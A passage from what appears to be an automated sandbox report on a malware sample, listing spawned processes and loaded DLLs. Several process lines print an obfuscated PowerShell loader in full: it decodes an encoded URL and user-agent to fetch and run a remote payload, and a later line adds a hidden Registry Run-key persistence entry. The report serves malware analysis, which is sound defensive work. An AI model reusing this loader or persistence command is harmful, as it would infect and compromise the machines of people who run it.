FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"Jump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
